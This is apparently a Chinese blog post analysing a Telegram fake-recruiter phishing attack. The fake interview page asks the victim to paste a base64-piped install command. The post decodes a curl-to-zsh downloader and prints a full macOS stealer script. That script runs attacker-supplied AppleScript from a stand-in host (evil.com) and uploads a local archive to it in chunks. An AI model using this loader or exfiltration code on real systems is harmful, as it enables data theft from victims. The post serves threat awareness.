见识 Tg 钓鱼
文中代码均已消毒处理 最近在看新的工作机会,遇到一个让加 tg 的,本来觉着没啥,也就在 tg 上沟通 越聊越觉得对面的文字不像是人打出来的,遣词造句的风格,难以言说 终于发来了面试链接,一点开就是个弹窗,要复制命令装驱动,一眼钓鱼 还是按耐不住好奇心,复制来看看,最基础的 echo | base64 -d | zsh 于是解码看看是啥 echo ‘The sound carder drver certificate is currently beinginstalledand updated. Please wait…’ & curl xxx.evil/xxx | zsh 好嘛,又下载了一个脚本,接着扒 又是个 base64 之后的压缩包解压再 eval 的脚本,继续解压看看 1#!/bin/zsh 2daemon_function() { 3 exec </dev/null 4 exec >/dev/null 5 exec 2>/dev/null 6 local domain="evil.com" 7 local token="xxxx" 8 local api_key="xx" 9 local file="/tmp/osalogging.zip" 10 if [ $# -gt 0 ]; then 11 curl -k -s --max-time 30 \ 12 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \ 13 -H "api-key: $api_key" \ 14 "http://$domain/dynamic?txd=$token&pwd=$1" | osascript 15 else 16 curl -k -s --max-time 30 \ 17 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \ 18 -H "api-key: $api_key" \ 19 "http://$domain/dynamic?txd=$token" | osascript 20 fi 21 if [ $? -ne 0 ]; then 22 exit 1 23 fi 24 if [[ ! -f "$file" || ! -s "$file" ]]; then 25 return 1 26 fi 27 local CHUNK_SIZE=$((10 * 1024 * 1024)) 28 local MAX_RETRIES=8 29 local upload_id=$(date +%s)-$(openssl rand -hex 8 2>/dev/null || echo $RANDOM$RANDOM) 30 local total_size 31 total_size=$(stat -f %z "$file" 2>/dev/null || stat -c %s "$file") 32 if [[ -z "$total_size" || "$total_size" -eq 0 ]]; then 33 return 1 34 fi 35 local total_chunks=$(( (total_size + CHUNK_SIZE - 1) / CHUNK_SIZE )) 36 local i=0 37 while (( i < total_chunks )); do 38 local offset=$((i * CHUNK_SIZE)) 39 local chunk_size=$CHUNK_SIZE 40 (( offset + chunk_size > total_size )) && chunk_size=$((total_size - offset)) 41 local success=0 42 local attempt=1 43 while (( attempt <= MAX_RETRIES && success == 0 )); do 44 http_code=$(dd if="$file" bs=1 skip=$offset count=$chunk_size 2>/dev/null | \ 45 curl -k -s -X PUT \ 46 --data-binary @- \ 47 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \ 48 -H "api-key: $api_key" \ 49 --max-time 180 \ 50 -o /dev/null \ 51 -w "%{http_code}" \ 52 "http://$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks" 2>/dev/null) 53 curl_status=$? 54 if [[ $curl_status -eq 0 && $http_code -ge 200 && $http_code -lt 300 ]]; then 55 success=1 56 else 57 ((attempt++)) 58 sleep $((3 + attempt * 2)) 59 fi 60 done 61 if (( success == 0 )); then 62 return 1 63 fi 64 ((i++)) 65 done 66 rm -f "$file" 67 return 0 68} 69if daemon_function "$@" & then 70 exit 0 71else 72 exit 1 73fi 终于是个有点事做的脚本了,做的事情也很简单,下载恶意脚本交给 osascript 执行,再上传本地的 /tmp/osalogging.zip 包 ...